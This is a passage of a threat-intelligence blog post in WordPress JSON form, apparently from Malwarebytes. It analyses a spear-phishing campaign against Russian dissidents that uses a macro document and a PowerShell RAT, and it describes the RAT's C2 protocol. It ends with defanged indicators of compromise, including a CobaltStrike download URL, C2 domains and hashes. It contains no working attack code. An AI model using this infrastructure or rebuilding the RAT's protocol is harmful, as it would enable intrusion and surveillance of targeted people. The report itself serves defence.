\"\" }<\/code><\/pre>\n<h2>Related attack<\/h2>\n<p>We have also identified new activity on March 28th that is associated with this same actor. In this new activity they distributed a macro embedded-document to deploy a PowerShell based Rat. This document uses &#8220;<em>\u0424\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u043e \u043d\u0430\u0434\u0437\u043e\u0440\u0443 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0441\u0432\u044f\u0437\u0438, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0439 \u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0439<\/em>&#8221; (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template which is also used in phishing emails described in the previous section. There is also infrastructure overlap with the other campaigns.  <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1.png\" data-rel=\"lightbox-image-8\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55368\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/block-doc1\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1.png\" data-orig-size=\"678,874\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"block-doc1\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1-233x300.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1-465x600.png\" loading=\"lazy\" width=\"678\" height=\"874\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1.png\" alt=\"\" class=\"wp-image-55368\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1.png 678w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1-233x300.png 233w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/block-doc1-465x600.png 465w\" sizes=\"auto, (max-width: 678px) 100vw, 678px\" \/><\/a><figcaption>Figure 9: template<\/figcaption><\/figure>\n<\/div>\n<p>The dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped.png\" data-rel=\"lightbox-image-9\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55361\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/ps-dropped\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped.png\" data-orig-size=\"1767,802\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ps-dropped\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped-300x136.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped-600x272.png\" loading=\"lazy\" width=\"1767\" height=\"802\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped.png\" alt=\"\" class=\"wp-image-55361\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped.png 1767w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped-300x136.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped-600x272.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped-1536x697.png 1536w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-dropped-767x349.png 767w\" sizes=\"auto, (max-width: 1767px) 100vw, 1767px\" \/><\/a><figcaption>Figure 10: Dropped PS script<\/figcaption><\/figure>\n<\/div>\n<p>After deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:<\/p>\n<ul>\n<li>JavaScript<\/li>\n<li>PowerShell<\/li>\n<li>Executable<\/li>\n<li>DLL<\/li>\n<\/ul>\n<p>All of Its communications with its server are in Base64 format. This Rat starts its activity by setting up some configurations which include the C2 url, intervals, debug mode and a parameter named group that initialized with &#8220;Madagascar&#8221; which probably is the alias of the threat actor. <\/p>\n<p>After setting up the configuration, it calls the &#8220;Initialize-Engine&#8221; function. This function collects the victim&#8217;s info including OS info, Username, Hostname, Bios info and also a host-domain value that shows if the machine in a domain member or not. It then appends all the collected into into a string and separate them by &#8220;|&#8221; character and at the end it add the group name and API config value. The created string is being send to the server using <em>Send-WebInit<\/em> function. This function adds &#8220;INIT%%%&#8221; string to the created string and base64 encodes it and sends it to the server.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated.png\" data-rel=\"lightbox-image-10\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55362\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/ps-deobfuscated\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated.png\" data-orig-size=\"968,776\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ps-deobfuscated\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated-300x240.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated-600x481.png\" loading=\"lazy\" width=\"968\" height=\"776\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated.png\" alt=\"\" class=\"wp-image-55362\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated.png 968w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated-300x240.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/ps-deobfuscated-600x481.png 600w\" sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><\/a><figcaption>Figure 11: PowerShell Rat<\/figcaption><\/figure>\n<\/div>\n<p>After performing the initialization, it goes into a loop that keeps calling the &#8220;Invoke-Engine&#8221; function. This function checks the incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends &#8220;GETTASK%%&#8221; in Base64 format to its server to show it is ready to get tasks and execute them. The &#8220;IC&#8221; command is used to delete itself.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task.png\" data-rel=\"lightbox-image-11\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55365\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/invoke-task\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task.png\" data-orig-size=\"550,448\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"invoke-task\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task-300x244.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task.png\" loading=\"lazy\" width=\"550\" height=\"448\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task.png\" alt=\"\" class=\"wp-image-55365\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task.png 550w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/invoke-task-300x244.png 300w\" sizes=\"auto, (max-width: 550px) 100vw, 550px\" \/><\/a><figcaption>Figure 12: Invoke task<\/figcaption><\/figure>\n<\/div>\n<p>The result of the task execution will be send to the server using &#8220;PUTTASK%%&#8221; command. <\/p>\n<h2>Infrastructure<\/h2>\n<p>The following shows the infrastructure used by this actor highlighting that the different lures are all connected. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined.png\" data-rel=\"lightbox-image-12\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img decoding=\"async\" data-attachment-id=\"55363\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/attachment\/undefined-3\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined.png\" data-orig-size=\"1560,802\" data-comments-opened=\"0\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"undefined\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined-300x154.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined-600x308.png\" loading=\"lazy\" width=\"1560\" height=\"802\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined.png\" alt=\"\" class=\"wp-image-55363\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined.png 1560w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined-300x154.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined-600x308.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2022\/03\/undefined-1536x790.png 1536w\" sizes=\"auto, (max-width: 1560px) 100vw, 1560px\" \/><\/a><figcaption>Figure 12: Infrastructure <\/figcaption><\/figure>\n<\/div>\n<p>The Malwarebytes Threat Intelligence continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.<\/p>\n<h2>IOCs<\/h2>\n<p><strong>RTF files host domain: <\/strong><br \/>digital-ministry[.]ru<br \/><strong>RTF files:<\/strong><br \/>PKH telegram.rtf<br \/>b19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e<br \/>PKH.rtf <br \/>38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20<br \/><strong>MSHTML exploit: <\/strong><br \/>wallpaper[.]skin\/office\/updates\/GtkjdsjkyLkjhsTYhdsd\/exploit.html<br \/>4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c<br \/><strong>CobaltStrike Download URL:<\/strong><br \/>wallpaper[.]skin\/office\/updates\/GtkjdsjkyLkjhsTYhdsd\/putty.exe<br \/><strong>CobaltStrike:<\/strong><br \/>Putty.exe<br \/>d4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d<br \/><strong>CobaltStrike C2:<\/strong><br \/>wikipedia-book[.]vote\/async\/newtab_ogb<br \/><strong>Macro based maldoc: <br \/><\/strong>c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28<br \/><strong>PowerShell based RAT:<\/strong><br \/>9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0<strong><br \/>PowerShell Rat C2:<\/strong><br \/>swordoke[.]com<strong><br \/><\/strong><\/p>\n<p><\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/\">New spear phishing campaign targets Russian dissidents<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Threat Intelligence Team| Date: Tue, 29 Mar 2022 18:02:48 +0000<\/strong><\/p>\n<p>We&#8217;ve identified a new campaign using a combination of exploits, malicious macros and other lures that is targeted at Russian individuals who may have violated restrictions imposed by the Russian government.<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/03\/new-spear-phishing-campaign-targets-russian-dissidents\/\">New spear phishing campaign targets Russian dissidents<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[25537,25538,3764,3924,1810,251,12040,8642],"class_list":["post-18617","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-cobaltstrike","tag-dissidents","tag-malware","tag-phishing","tag-rat","tag-russia","tag-threat-intelligence","tag-ukraine"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/18617","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=18617"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/18617\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=18617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=18617"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=18617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}